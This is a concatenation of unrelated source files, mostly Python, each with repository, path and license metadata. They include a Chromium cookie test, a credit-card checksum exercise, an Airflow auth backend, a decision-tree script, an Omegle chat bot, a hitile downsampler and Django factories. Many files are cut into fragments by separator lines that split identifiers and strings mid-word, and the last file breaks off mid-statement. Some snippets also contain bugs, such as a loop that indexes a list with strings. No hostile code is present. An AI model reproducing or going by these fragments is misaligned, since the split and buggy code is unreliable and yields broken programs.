self.deleteBaseDNButton = QtGui.QPushButton(self.LDAPGroup)
self.deleteBaseDNButton.setAutoDefault(False)
self.deleteBaseDNButton.setObjectName(_fromUtf8("deleteBaseDNButton"))
|
scheib/chromium
|
third_party/blink/web_tests/external/wpt/cookies/resources/dropSecure.py
|
Python
|
bsd-3-clause
| 501 | 0.001996 |
from cookies.
|
resources.helpers import makeDropCookie, setNoCacheAndCORSHeaders
def main(request, response):
"""Respond to `/cookie/drop/secure` by dropping the two cookie set by
`setSecureTestCookies()`"""
headers = setNoCacheAndCORSHeaders(request, response)
# Expire the cookies, and return a JSON-encoded success code.
headers.append(makeDropCookie(b"alone_secure", False))
headers.append(makeDropCookie(b"alone_insecure", False))
return headers, b'{"succ
|
ess": true}'
|
pandastrail/InfoEng
|
scripting/exercises/p06_2.py
|
Python
|
gpl-3.0
| 1,641 | 0.007932 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 18 16:28:59 2017
@author: hase
2. Credit Card Number Check
Suppose you have been hired by MeisterCard to write a function
which checks if a given credit card number is valid.
Your function check(card_number) should take a string card_number as input.
- First, if the string does not follow the format "#### #### #### ####", where
each # is a digit, it should retur
|
n False.
- Then, if the sum of the digits is divisible by 10 (a "checksum" method),
then the procedure should return True, o
|
therwise it should return False.
For example, if card_number is the string "9384 3495 3297 0123" then although
the format is correct, the digit’s sum is 72 so you should return False.
Hints:
- You can split a string at a specific character using the function split().
parts = my_string.split('a')
- You can test if a string contains only digits with the function isdigit().
only_digits = my_string.isdigit()
"""
# Modules
import numpy as np
# Functions
def invalid():
''' Feedback to user after an invaid input'''
print('Invalid number, please try again!')
def card():
''' Get user input with card number'''
card_num = input('Card number, #### #### #### ####? ')
if len(card_num) == 19:
sanitized = card_num.split(' ')
s = len(sanitized)
if s == 4:
i = range(s)
for i in sanitized:
if sanitized[i].isdigit():
print('Valid number!')
else: invalid()
else: invalid()
else: invalid()
return card_num
card()
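# A sketch of the check(card_number) function described in the module docstring
# above (the exercise asks for it, but the interactive code above never defines
# it): validate the "#### #### #### ####" format first, then apply the
# digit-sum-divisible-by-10 rule.
def check(card_number):
    parts = card_number.split(' ')
    # Four groups of exactly four digits
    if len(parts) != 4 or not all(len(p) == 4 and p.isdigit() for p in parts):
        return False
    digit_sum = sum(int(d) for p in parts for d in p)
    return digit_sum % 10 == 0

# Docstring example: correct format but digit sum 72, so the result is False.
# print(check("9384 3495 3297 0123"))  # -> False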
|
danielvdende/incubator-airflow
|
airflow/api/auth/backend/default.py
|
Python
|
apache-2.0
| 1,051 | 0 |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the Li
|
cense for the
# specific language governing permissions and limitations
# under the License.
from functools import wraps
client_auth = None
def init_app(app):
pass
def requires_authentication(function):
@wraps(function)
def decorated(*args, **kwargs):
return function(*args, **kwargs)
return d
|
ecorated
|
teirce/game-valet
|
app/startup/common_settings.py
|
Python
|
bsd-2-clause
| 957 | 0.00209 |
import os
# ***********************************
# Settings common to all environments
# ***********************************
# Application settings
APP_NAME = "Game Valet"
APP_SYSTEM_ERROR_SUBJECT_LINE = APP_NA
|
ME + " system error"
# Flask settings
CSRF_ENABLED = True
# Flask-User settings
USER_APP_NAME = APP_NAME
USER_ENABLE_CHANGE_PASSWORD = True # Allow users to change their password
USER_ENABLE_CHANGE_USERNAME = False # Allow users to change their username
USER_ENABLE_CONFIRM_EMAIL = True # Force u
|
sers to confirm their email
USER_ENABLE_FORGOT_PASSWORD = True # Allow users to reset their passwords
USER_ENABLE_EMAIL = True # Register with Email
USER_ENABLE_REGISTRATION = True # Allow new users to register
USER_ENABLE_RETYPE_PASSWORD = True # Prompt for `retype password` in:
USER_ENABLE_USERNAME = False # Register and Login with username
USER_AFTER_LOGIN_ENDPOINT = 'core.user_page'
USER_AFTER_LOGOUT_ENDPOINT = 'core.home_page'
|
dmschreiber/tapiriik
|
tapiriik/web/email.py
|
Python
|
apache-2.0
| 963 | 0.015576 |
from djan
|
go.template.loader import get_template
from django.template import Context
from django.core.mail import EmailMultiAltern
|
atives
from django.conf import settings
def generate_message_from_template(template, context):
context["STATIC_URL"] = settings.STATIC_URL
# Mandrill is set up to inline the CSS and generate a plaintext copy.
html_message = get_template(template).render(Context(context)).strip()
context["plaintext"] = True
plaintext_message = get_template(template).render(Context(context)).strip()
return html_message, plaintext_message
def send_email(recipient_list, subject, html_message, plaintext_message=None):
if type(recipient_list) is not list:
recipient_list = [recipient_list]
email = EmailMultiAlternatives(subject=subject, body=plaintext_message, from_email="tapiriik <mailer@tapiriik.com>", to=recipient_list, headers={"Reply-To": "contact@tapiriik.com"})
email.attach_alternative(html_message, "text/html")
email.send()
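# Usage sketch (not part of the original module; the template path, context and
# addresses are illustrative assumptions):
#
# html, text = generate_message_from_template("email/sync_error.html", {"user": user})
# send_email("user@example.com", "tapiriik sync error", html, plaintext_message=text)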
|
JNero/Machine-Learning-in-action
|
DicisionTree/trees.py
|
Python
|
apache-2.0
| 3,852 | 0.003375 |
import matplotlib.pyplot as plt
import operator
from math import log
import pickle
def calcShannonEnt(dataSet):
numEntries = len(dataSet)
labelCounts = {}
for fv in dataSet:
currentLabel = fv[-1]
if currentLabel not in labelCounts.keys():
labelCounts[currentLabel] = 0
labelCounts[currentLabel] += 1
shannonEnt = 0.0
for key in labelCounts:
prob = float(labelCounts[key]) / numEntries
shannonEnt -= prob * log(prob, 2)
return shannonEnt
def createDataSet():
dataSet = [[1, 1, 'yes'], [1, 1, 'yes'],
[1, 0, 'no'], [0, 1, 'no'], [0, 1, 'no']]
labels = ['no surfacing', 'flippers']
return dataSet, labels
def splitDataSet(dataSet, axis, value):
retDataSet = []
for featVec in dataSet:
if featVec[axis] == value:
reducedFeatVec = featVec[:axis]
reducedFeatVec.extend(featVec[axis + 1:])
retDataSet.append(reducedFeatVec)
return retDataSet
def chooseBestFeatureToSplit(dataSet):
numFeatures = len(dataSet[0]) - 1
baseEntropy = calcShannonEnt(dataSet)
bestInfoGain = 0.0
bestFeature = -1
for i in range(numFeatures):
featList = [example[i] for example in dataSet]
uniqueVals = set(featList)
newEntropy = 0.0
for value in uniqueVals:
subDataSet = splitDataSet(dataSet, i, value)
prob = len(subDataSet) / float(len(dataSet))
newEntropy += prob * calcShannonEnt(subDataSet)
infoGain = baseEntropy - newEntropy
if(infoGain > bestInfoGain):
bestInfoGain = infoGain
bestFeature = i
return bestFeature
def majorityCnt(classList):
classCount = {}
for vote in classList:
if vote not in classCount.keys():
classCount[vote] = 0
classCount[vote] += 1
sortedClassCount = sorted(
classCount.items(), key=operator.itemgetter(1), reverse=True)
return sortedClassCount[0][0]
def createTree(dataSet, labels):
classList = [example[-1] for example in dataSet]
# print('classList.count is :',classList.count(classList[0]))
# print('len(classList) is :',len(classList))
if classList.count(classList[0]) == len(classList):
return classList[0]
# print('len(dataSet[0] is :',len(dataSet[0]))
if len(dataSet[0]) == 1:
return majorityCnt(classList)
bestFeat = chooseBestFeatureToSplit(dataSet)
# print('bestFeat is : ',bestFeat)
bestFeatLabel = labels[bestFeat]
# print('bestFeatLabel is :',bestFeatLabel)
myTree = {bestFeatLabel: {}}
print
del(labels[bestFeat])
featValues = [example[bestFeat] for example in dataSet]
uniqueVals = set(featValues)
for v
|
alue in uniqueVals:
subLabels = labels[:]
myTree[bestFeatLabel][value] = createTree(
splitDataSet(dataSet, bestFeat, value), subLabels)
return myTree
def classify(in
|
putTree, featLabels, testVec):
firstStr = list(inputTree.keys())[0]
# print('firstStr is : ',firstStr)
secondDict = inputTree[firstStr]
# print('secondDict is :',secondDict)
featIndex = featLabels.index(firstStr)
# print('featIndex is :',featIndex)
# print(type(featIndex))
for key in secondDict.keys():
# print(key)
# print('testVec is :',testVec[featIndex])
# print(type(key))
# print(type(testVec[featIndex]))
if testVec[featIndex] == key:
if type(secondDict[key]).__name__ == 'dict':
classLabel = classify(secondDict[key], featLabels, testVec)
else:
classLabel = secondDict[key]
return classLabel
def storeTree(inputTree, filename):
fw = open(filename, 'wb')
pickle.dump(inputTree, fw)
fw.close()
def grabTree(filename):
fr = open(filename, 'rb')
return pickle.load(fr)
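# Minimal usage sketch for the functions above (illustrative). createTree()
# deletes entries from the labels list it is given, so a copy is passed in and
# the original list stays intact for classify():
if __name__ == '__main__':
    myDat, myLabels = createDataSet()
    myTree = createTree(myDat, myLabels[:])
    print(myTree)  # {'no surfacing': {0: 'no', 1: {'flippers': {0: 'no', 1: 'yes'}}}}
    print(classify(myTree, myLabels, [1, 0]))  # 'no'
    storeTree(myTree, 'classifierStorage.txt')
    print(grabTree('classifierStorage.txt'))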
|
iohannez/gnuradio
|
gr-comedi/python/comedi/qa_comedi.py
|
Python
|
gpl-3.0
| 1,256 | 0.001592 |
#!/usr/bin/env python
#
# Copyright 2005,2007,2012 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; withou
|
t even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 0211
|
0-1301, USA.
#
from gnuradio import gr, gr_unittest, comedi
class test_comedi(gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block()
def tearDown(self):
self.tb = None
def test_000_nop(self):
"""Just see if we can import the module...
They may not have COMEDI library, etc. Don't try to run anything"""
pass
if __name__ == '__main__':
gr_unittest.run(test_comedi, "test_comedi.xml")
|
all-of-us/raw-data-repository
|
rdr_service/dao/resource_dao.py
|
Python
|
bsd-3-clause
| 2,900 | 0.001034 |
#
# This file is subject to the terms and conditions defined in the
# file 'LICENSE', which is part of this source code package.
#
from collections import OrderedDict
from sqlalchemy import inspect
from sqlalchemy.engine import ResultProxy
from rdr_service.dao.base_dao import UpsertableDao
from rdr_service.model.resource_data import ResourceData
from rdr_service.resource.fields import EnumString, EnumInteger
class ResourceDataDao(UpsertableDao):
def __init__(self, backup=False):
"""
:param backup: Use backup readonly database connection.
"""
super().__init__(ResourceData, backup=backup)
def to_resource_dict(self, obj, schema=None, result_proxy=None):
"""
Dump a sqlalchemy model or query result object to python dict.
:param obj: SqlAlchemy Query Result object or Row Proxy object.
:param schema: Resource schema object.
:param result_proxy: ResultProxy object if obj=RowProxy object.
:return: ordered dict
"""
if not obj:
return None
data = OrderedDict()
# Get the list of columns returned in the query.
if result_proxy and isinstance(result_proxy, ResultProxy): # this is a ResultProxy object
columns = list()
for column in result_proxy.cursor.description:
columns.append(column[0])
elif hasattr(obj, "_fields"): # This is a custom query result object.
columns = obj._fields
elif hasattr(obj, '_keymap'): # RowProxy
columns = obj._keymap
else:
mapper = inspect(obj) # Simple model object
columns = mapper.attrs
for column in columns:
key = str(column.key) if hasattr(column, "key") else column
if not isinstance(key, str):
# logging.warning('bad column key value [{0}], unable to lookup result column value.'.format(column))
continue
value = getattr(obj, key)
int_id_value = None
if schema:
# Check for Enum column type and convert to Enum if needed.
_field = schema.get_field(key)
if type(_field) == EnumString:
value = str(_field.enum(value))
_id_field = schema.get_field(key + '_id')
if _id_field and type(_id_field) == EnumInteger:
int_id_value = int(_field.enum(value))
elif type(_field
|
) == EnumInteger:
value = int(_field.enum(value))
data[key] = value
# Automatically generate an integer field for enum/string fields that have a paire
|
d _id integer field
# E.g.: status/status_id, code_type/code_type_id, etc.
if int_id_value:
data[key + '_id'] = int_id_value
return data
|
dschien/PyExcelModelingHelper
|
tests/test_DataSeriesLoader.py
|
Python
|
mit
| 3,547 | 0.003383 |
import unittest
from datetime import datetime
import numpy as np
import pandas as pd
from excel_helper.helper import DataSeriesLoader
class TestDataFrameWithCAGRCalculation(unittest.TestCase):
def test_simple_CAGR(self):
"""
Basic test case, applying CAGR to a Pandas Dataframe.
:return:
"""
# the time axis of our dataset
times = pd.date_range('2009-01-01', '2009-04-01', freq='MS')
# the sample axis our dataset
samples = 2
dfl = DataSeriesLoader.from_excel('test.xlsx', times, size=samples, sheet_index=0)
res = dfl['static_one']
print (res)
assert res.loc[[datetime(2009, 1, 1)]][0] == 1
assert np.abs(res.loc[[datetime(2009, 4, 1)]][0] - pow(1.1, 3. / 12)) < 0.00001
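        # The expected value is plain CAGR arithmetic: the 1.1 factor implies a
        # 10% annual growth rate compounded over the elapsed fraction of a year,
        # i.e. value(t) = 1 * 1.1 ** (months / 12); after 3 months this is
        # 1.1 ** 0.25 ≈ 1.0241.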
def test_CAGR_ref_date_within_bounds(self):
"""
Basic test case, applying CAGR to a Pandas Dataframe.
:return:
"""
# the time axis of our dataset
times = pd.date_range('2009-01-01', '2009-04-01', freq='MS')
# the sample axis our dataset
samples = 2
dfl = DataSeriesLoader.from_excel('test.xlsx', times, size=samples, sheet_index=0)
res = dfl['static_one']
assert res.loc[[datetime(2009, 1, 1)]][0] == 1
assert np.abs(res.loc[[datetime(2009, 4, 1)]][0] - pow(1.1, 3. / 12)) < 0.00001
def test_CAGR_ref_date_before_start(self):
"""
Basic test case, applying CAGR to a Pandas Dataframe.
:return:
"""
# the time axis of our dataset
times = pd.date_range('2009-01-01', '2009-04-01', freq='MS')
# the sample axis our dataset
samples = 2
dfl = DataSeriesLoader.from_excel('test.xlsx', times, size=samples, sheet_index=0)
# equivalent to dfl['test_ref_date_before_start']
self.assertRaises(AssertionError, dfl.__getitem__, 'test_ref_date_before_start')
def test_CAGR_ref_date_after_end(self):
"""
Basic test case, applying CAGR to a Pandas Dataframe.
:return:
"""
# the time axis of our dataset
times = pd.date_range('2009-01-01', '2009-04-01', freq='MS')
# the sample axis our dataset
samples = 2
dfl = DataSeriesLoader.from_excel('test.xlsx', times, size=samples, sheet_index=0
|
)
        # equivalent to dfl['test_ref_date_after_end']
self.assertRaises(AssertionError, dfl.__getitem__, 'test_ref_date_after_end')
def test_simple_CAGR_from_pandas(sel
|
f):
times = pd.date_range('2009-01-01', '2009-04-01', freq='MS')
xls = pd.ExcelFile('test.xlsx')
df = xls.parse('Sheet1')
ldr = DataSeriesLoader.from_dataframe(df, times, size=2)
res = ldr['static_one']
assert res.loc[[datetime(2009, 1, 1)]][0] == 1
assert np.abs(res.loc[[datetime(2009, 4, 1)]][0] - pow(1.1, 3. / 12)) < 0.00001
def test_simple_CAGR_mm(self):
"""
Basic test case, applying CAGR to a Pandas Dataframe.
:return:
"""
# the time axis of our dataset
times = pd.date_range('2015-01-01', '2016-01-01', freq='MS')
# the sample axis our dataset
samples = 2
dfl = DataSeriesLoader.from_excel('test.xlsx', times, size=samples, sheet_index=0)
res = dfl['mm']
print(res)
# assert res.loc[[datetime(2009, 1, 1)]][0] == 1
# assert np.abs(res.loc[[datetime(2009, 4, 1)]][0] - pow(1.1, 3. / 12)) < 0.00001
if __name__ == '__main__':
unittest.main()
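# Note on the expected values above: the loader applies compound annual growth, so a cell
# with a 10% CAGR and reference date 2009-01-01 scales by (1 + 0.10) ** (months / 12);
# for 2009-04-01 that is 1.1 ** (3 / 12) ≈ 1.0241. The 10% rate is inferred from the
# asserts, not read from 'test.xlsx' itself.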
gmangavin/PyMegle | Other Py/PyMegleTwo.py | Python | mit | 5,053 | 0.014843
'''
View the coding live on Twitch @ https://www.twitch.tv/gmangavin and look at the github @ https://github.com/gmangavin/PyWeb
chromedriver for gui view, phantomjs for ghost view.
'''
import selenium.webdriver #Imports module
import time #Imports time
import threading #Imports threading, used to have multiple things happen at the same time.
import os #Imports OS
N = False #Used for the bool loop.
while N == False:
EngineChoice = input('Would you like a visual of the bot? (Y/N): ') #Part one for the web driver choice
YN = (EngineChoice.lower()) #Prevents capatalization error.
if YN == ('y'):
while N == False:
            VarChoice = input('Would you like Firefox or Chrome? (F/C): ') #Part two for the web driver choice
FC = (VarChoice.lower()) #Prevents capatalization error.
if FC == ('f'):
try:
WebVar = selenium.webdriver.Firefox()
N = True
except selenium.common.exceptions.WebDriverException:
print("You don't seem to have the firefox webdriver installed. You can get it here https://github.com/mozilla/geckodriver/releases")
elif FC == ('c'):
try:
WebVar = selenium.webdriver.Chrome()
N = True
except:
print("You don't seem to have the chrome webdriver installed. You can get it here https://sites.google.com/a/chromium.org/chromedriver/downloads")
else:
print('Try again')
elif YN == ('n'):
try:
WebVar = selenium.webdriver.PhantomJS()
N = True
except selenium.common.exceptions.WebDriverException:
print("You don't seem to have the PhantomJS webdriver installed. You can get it here http://phantomjs.org/")
else:
print('Try again')
#A while loop to make sure the user enters in a correct character.
#Allows the user to choose which web driver they want to use.
Interest = input("What is a common interest you're looking for?: ")
WebVar.get('https://www.omegle.com')
print(WebVar.title)
WebVar.find_element_by_xpath('//*[@id="topicsettingscontainer"]/div/div[1]/span[2]').click() #Clicks the area for typing
Send = WebVar.find_element_by_class_name('newtopicinput') #Creates an input variable for text area.
Send.send_keys(Interest + ',') #Sends input to text area.
WebVar.find_element_by_xpath('//*[@id="textbtn"]').click() #Clicks the 'text' button
Disconnected = False
def Disconnect(*args):
WebVar.find_element_by_xpath('/html/body/div[7]/div/div/div[2]/table/tbody/tr/td[1]/div/button').click()
WebVar.find_element_by_xpath('/html/body/div[7]/div/div/div[2]/table/tbody/tr/td[1]/div/button').click()
global Disconnected
Disconnected = True
return Disconnected
def Change(*args):
if Disconnected == True:
os.system('cls')
WebVar.find_element_by_xpath('/html/body/div[7]/div/div/div[1]/div[1]/div/div[4]/div/a').click()
Interest = input("What is a common interest you're looking for?: ")
Send2 = WebVar.find_element_by_class_name('topicplaceholder')
Send2.send_keys(Interest + ',') #Sends input to text area.
else:
print("You need to disconnect first")
def Connect(*args):
if Disconnected == True:
os.system('cls')
WebVar.find_element_by_xpath('/html/body/div[7]/div/div/div[2]/table/tbody/tr/td[1]/div/button').click()
os.system('cls')
print('Rebooting search.')
threading.Thread(target=StatusMode)._stop()
threading.Thread(target=UserMode)._stop()
time.sleep(1)
threading.Thread(target=StatusMode).start()
os.system('cls')
elif Disconnected == False:
print("You're still connected.")
else:
print("something is just broken")
def UserMode(*args):
while True:
UserM = input('') #Has the user type an interest.
if UserM == "/end":
Disconnect()
elif UserM == "/start":
Connect()
elif UserM == "/change":
Change()
else:
Sending = WebVar.find_element_by_class_name('chatmsg') #Takes the class used for user input.
Sending.send_keys(UserM)
WebVar.find_element_by_class_name('sendbtn').click()
def StatusMode(*args):
threading.Thread(target=UserMode).start() #Starts the operation in a thread.
StatusNew = None #Create a variable with no value.
while True:
Status = WebVar.find_element_by_xpath('/html/body/div[7]/div/div/div[1]/div[1]/div').text #Takes the text info from xpath
if StatusNew == (Status):
continue
else:
StatusNew = Status
if "Stranger has disconnected." not in Status:
os.system('cls') #Refreshes chat.
print(StatusNew)
print('')
else:
Disconnect()
threading.Thread(target=StatusMode).start() #Starts the operation in a thread.
hms-dbmi/clodius | clodius/tiles/hitile.py | Python | mit | 10,847 | 0.001106
import base64
import h5py
import math
import numpy as np
import os
import os.path as op
def array_to_hitile(
old_data, filename, zoom_step=8, chunks=(1e6,), agg_function=np.sum
):
"""
Downsample a dataset so that it's compatible with HiGlass (filetype: hitile, datatype: vector)
Parameters
----------
old_data: np.array
A numpy array containing the data to be downsampled
filename: string
The output filename where the resulting multi-resolution
data will be stored.
zoom_step: int
The number of zoom levels to skip when aggregating
"""
import dask.array as da
if op.exists(filename):
os.remove(filename)
f_new = h5py.File(filename, "w")
tile_size = 1024
max_pos = len(old_data)
# we store every n'th zoom level
zoom_factor = 2 ** zoom_step
max_zoom = math.ceil(math.log(max_pos / tile_size) / math.log(2))
    meta = f_new.create_dataset("meta", (1,), dtype="f")
meta.attrs["tile-size"] = tile_size
meta.attrs["zoom-step"] = zoom_step
meta.attrs["max-length"] = max_pos
meta.attrs["max-zoom"] = max_zoom
meta.attrs["max-width"] = tile_size * 2 ** max_zoom
min_data = da.from_array(old_data, chunks)
max_data = da.from_array(old_data, chunks)
old_data = da.from_array(old_data, chunks)
for z in range(0, max_zoom, zoom_step):
        values_dset = f_new.require_dataset(
            "values_" + str(z), (len(old_data),), dtype="f", compression="gzip"
)
mins_dset = f_new.require_dataset(
"mins_" + str(z), (len(old_data),), dtype="f", compression="gzip"
)
maxs_dset = f_new.require_dataset(
"maxs_" + str(z), (len(old_data),), dtype="f", compression="gzip"
)
da.store(old_data, values_dset)
da.store(min_data, mins_dset)
da.store(max_data, maxs_dset)
# f_new['values_' + str(z)][:] = old_data
# see if we need to pad the end of the dataset
# if so, use the previous last value
if len(old_data) % zoom_factor != 0:
old_data = da.concatenate(
(old_data, [old_data[-1]] * (zoom_factor - len(old_data) % zoom_factor))
)
min_data = da.concatenate(
(min_data, [max_data[-1]] * (zoom_factor - len(min_data) % zoom_factor))
)
max_data = da.concatenate(
(max_data, [max_data[-1]] * (zoom_factor - len(max_data) % zoom_factor))
)
# aggregate the data by summing adjacent datapoints
# sys.stdout.write('summing...')
# sys.stdout.flush()
# print("fdsdsfs:", math.ceil(len(old_data) / zoom_factor), zoom_factor)
# print("chunks:", chunks, zoom_factor, 'len:', len(old_data))
old_data = old_data.rechunk(chunks)
min_data = old_data.rechunk(chunks)
max_data = old_data.rechunk(chunks)
# print('zoom_factor', zoom_factor, old_data.shape)
old_data = da.coarsen(agg_function, old_data, {0: zoom_factor})
min_data = da.coarsen(np.min, max_data, {0: zoom_factor})
max_data = da.coarsen(np.max, max_data, {0: zoom_factor})
# reshape( (math.ceil(len(old_data) / zoom_factor), zoom_factor)).sum(axis=1)
# sys.stdout.write(' done\n')
# sys.stdout.flush()
"""
if len(old_data) < 10000:
plt.plot(old_data)
"""
# plt.plot(old_data)
f_new.close()
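# Usage sketch (file name and input are illustrative): write a multi-resolution hitile
# file from a 1-D array, which get_data() below can then serve tile-by-tile.
#
#     values = np.random.rand(1000000)
#     array_to_hitile(values, '/tmp/example.hitile', zoom_step=8)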
def aggregate(a, num_to_agg):
if len(a) % num_to_agg != 0:
a = np.concatenate((a, [a[-1]] * (num_to_agg - len(a) % num_to_agg)))
return a.reshape((math.ceil(len(a) / num_to_agg), num_to_agg)).sum(axis=1)
def aggregate_min(a, num_to_agg):
if len(a) % num_to_agg != 0:
a = np.concatenate((a, [a[-1]] * (num_to_agg - len(a) % num_to_agg)))
return a.reshape((math.ceil(len(a) / num_to_agg), num_to_agg)).min(axis=1)
def aggregate_max(a, num_to_agg):
if len(a) % num_to_agg != 0:
a = np.concatenate((a, [a[-1]] * (num_to_agg - len(a) % num_to_agg)))
return a.reshape((math.ceil(len(a) / num_to_agg), num_to_agg)).max(axis=1)
def get_data(hdf_file, z, x):
"""
Return a tile from an hdf_file.
:param hdf_file: A file handle for an HDF5 file (h5py.File('...'))
:param z: The zoom level
:param x: The x position of the tile
"""
# is the title within the range of possible tiles
if x > 2 ** z:
print("OUT OF RIGHT RANGE")
return ([], [], [])
if x < 0:
print("OUT OF LEFT RANGE")
return ([], [], [])
d = hdf_file["meta"]
tile_size = int(d.attrs["tile-size"])
zoom_step = int(d.attrs["zoom-step"])
max_zoom = int(d.attrs["max-zoom"])
max_width = tile_size * 2 ** max_zoom
if "max-position" in d.attrs:
max_position = int(d.attrs["max-position"])
else:
max_position = max_width
rz = max_zoom - z
# tile_width = max_width / 2**z
# because we only store some a subsection of the zoom levels
next_stored_zoom = zoom_step * math.floor(rz / zoom_step)
zoom_offset = rz - next_stored_zoom
# the number of entries to aggregate for each new value
num_to_agg = 2 ** zoom_offset
total_in_length = tile_size * num_to_agg
# which positions we need to retrieve in order to dynamically aggregate
start_pos = int((x * 2 ** zoom_offset * tile_size))
end_pos = int(start_pos + total_in_length)
# print("max_position:", max_position)
max_position = int(max_position / 2 ** next_stored_zoom)
# print("new max_position:", max_position)
# print("start_pos:", start_pos)
# print("end_pos:", end_pos)
# print("next_stored_zoom", next_stored_zoom)
# print("max_position:", int(max_position))
f = hdf_file["values_" + str(int(next_stored_zoom))]
f_min = hdf_file["mins_" + str(int(next_stored_zoom))]
f_max = hdf_file["maxs_" + str(int(next_stored_zoom))]
if start_pos > max_position:
# we want a tile that's after the last bit of data
a = np.zeros(end_pos - start_pos)
a.fill(np.nan)
a_min = np.zeros(end_pos - start_pos)
a_min.fill(np.nan)
# umm, I don't think this needs to be here since
# everything should be nan
ret_array = aggregate(a, int(num_to_agg))
min_array = aggregate_min(a_min, int(num_to_agg))
        # a_max mirrors a_min so that max_array is defined on this all-NaN branch
        a_max = np.zeros(end_pos - start_pos)
        a_max.fill(np.nan)
        max_array = aggregate_max(a_max, int(num_to_agg))
elif start_pos < max_position and max_position < end_pos:
a = f[start_pos:end_pos][:]
a[max_position + 1 : end_pos] = np.nan
a_min = f_min[start_pos:end_pos][:]
a_min[max_position + 1 : end_pos] = np.nan
a_max = f_max[start_pos:end_pos][:]
a_max[max_position + 1 : end_pos] = np.nan
ret_array = aggregate(a, int(num_to_agg))
min_array = aggregate_min(a_min, int(num_to_agg))
max_array = aggregate_max(a_max, int(num_to_agg))
else:
ret_array = aggregate(f[start_pos:end_pos], int(num_to_agg))
min_array = aggregate_min(f_min[start_pos:end_pos], int(num_to_agg))
max_array = aggregate_max(f_max[start_pos:end_pos], int(num_to_agg))
# print("ret_array:", f[start_pos:end_pos])
# print('ret_array:', ret_array)
# print('nansum', np.nansum(ret_array))
# check to see if we counted the number of NaN values in the given
# interval
f_nan = None
if "nan_values_" + str(int(next_stored_zoom)) in hdf_file:
f_nan = hdf_file["nan_values_" + str(int(next_stored_zoom))]
nan_array = aggregate(f_nan[start_pos:end_pos], int(num_to_agg))
num_aggregated = 2 ** (max_zoom - z)
num_vals_array = np.zeros(len(nan_array))
num_vals_array.fill(num_aggregated)
num_summed_array = num_vals_array - nan_array
averages_array = ret_array / num_summed_array
return (averages_array, min_array, max_array)
return (ret_array, min_array, max_array)
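# Usage sketch (path is illustrative): open the hitile file written above and fetch the
# lowest-zoom tile; the three arrays are the aggregated, min and max values per bin.
#
#     with h5py.File('/tmp/example.hitile', 'r') as f:
#         means, mins, maxs = get_data(f, 0, 0)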
def tileset_info(hitile_path):
"""
Get the tileset info for a hitile file.
Parameters
-----
eevee/cocos2d-mirror | test/test_spawn.py | Python | bsd-3-clause | 1,024 | 0.030273
# This code is so you can run the samples without installing the package
import sys
import os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
#
testinfo = "s, t 5, s, t 10.1, s, t 10.2, s, q"
tags = "spawn, Reverse"
import cocos
from cocos.director import director
from cocos.actions import Rotate, Reverse, MoveBy, Delay
import pyglet
from cocos.sprite import Sprite
class TestLayer(cocos.layer.Layer):
def __init__(self):
super( TestLayer, self ).__init__()
x,y = director.get_window_size()
self.sprite = Sprite( 'grossini.png', (x/2, y/2) )
self.add( self.sprite )
self.sprite2 = Sprite( 'grossini.png', (x/2, y/4) )
self.add( self.sprite2 )
seq = Rotate( 360, 10 ) | MoveBy((x/2,0))
self.sprite.do( seq )
        self.sprite2.do( Reverse( seq ) )
def main():
director.init()
test_layer = TestLayer ()
main_scene = cocos.scene.Scene (test_layer)
director.run (main_scene)
if __name__ == '__main__':
main()
Coaxis-ASP/opt | backend/api/tests/factories.py | Python | gpl-3.0 | 1,150 | 0
import factory
from api import models
class ClientFactory(factory.DjangoModelFactory):
class Meta:
model = models.Client
name = 'Coaxis'
@factory.django.mute_signals(models.post_save)
class UserFactory(factory.DjangoModelFactory):
class Meta:
model = models.MyUser
email = factory.Sequence(lambda n: 'u{0}@coaxis.com'.format(n))
password = factory.PostGenerationMethodCall('set_password', 'password')
is_staff = False
class EmployeeFactory(factory.DjangoModelFactory):
    class Meta:
model = models.Employee
user = factory.SubFactory(UserFactory)
is_technician = False
@factory.post_generation
def clients(self, create, extracted, **kwargs):
if not create: # Simple build, do nothing.
return
if extracted: # A list of objects were passed in, use them
for client in extracted:
self.clients.add(client)
class TechnicianFactory(EmployeeFactory):
is_technician = True
class DaemonFactory(factory.DjangoModelFactory):
class Meta:
model = models.Daemon
client = factory.SubFactory(ClientFactory)
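# Usage sketch (names are illustrative): the clients post_generation hook above lets a
# test attach an employee to several clients in one call.
#
#     c1, c2 = ClientFactory(name='Acme'), ClientFactory(name='Globex')
#     employee = EmployeeFactory(clients=(c1, c2), is_technician=True)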
openaid-IATI/OIPA | OIPA/api/generics/views.py | Python | agpl-3.0 | 6,974 | 0.000143
import copy
from django.db.models.fields.related import ForeignKey, OneToOneField
from rest_framework import mixins
from rest_framework.generics import (
GenericAPIView, ListAPIView, ListCreateAPIView, RetrieveAPIView,
RetrieveUpdateDestroyAPIView
)
from api.generics.serializers import (
DynamicFieldsModelSerializer, DynamicFieldsSerializer
)
class DynamicView(GenericAPIView):
# foreign / one-to-one fields that can be used with select_related()
select_related_fields = []
serializer_fields = []
field_source_mapping = {}
fields = ()
selectable_fields = ()
def __init__(self, *args, **kwargs):
"""
Extract prefetches and default fields from Meta
"""
# TODO: move this to a meta class, to evaluate once when defining the
# class
# TODO: This is not efficient - 2016-01-20
serializer_class = self.get_serializer_class()
serializer = serializer_class() # need an instance to extract fields
model = serializer_class.Meta.model
assert issubclass(
serializer_class, DynamicFieldsModelSerializer
